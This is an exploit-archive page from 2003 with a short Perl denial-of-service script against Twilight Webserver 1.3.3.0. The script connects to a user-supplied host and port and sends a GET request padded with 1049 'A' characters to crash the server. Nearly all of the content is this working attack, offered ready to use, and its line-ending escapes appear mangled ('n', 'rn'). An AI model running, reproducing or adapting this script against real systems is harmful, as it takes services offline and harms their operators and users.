[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit
# Published : 2003-07-07
# Author : n/a
# Previous Title : Cisco IOS IPv4 Packets Denial of Service Exploit
# Next Title : MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit


# Denial of Service Attack against Twilight Webserver v1.3.3.0
# http://www.twilightutilities.com
# Original author wanted the c code removed.
# /str0ke

use strict;
use IO::Socket;

sub usage
{
    print "Denial of Service Attack against Twilight Webserver v1.3.3.0n";
    print "Usage: $0 www.example.com portn";
    exit ();
}

my $host= shift || &usage;
my $port= shift || 80;

my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp') or die("Connect issue");

# pretty close to the output of the c code.
print $sock "GET" . "A" x 1049 . "rn";

# www.Syue.com [2003-07-07]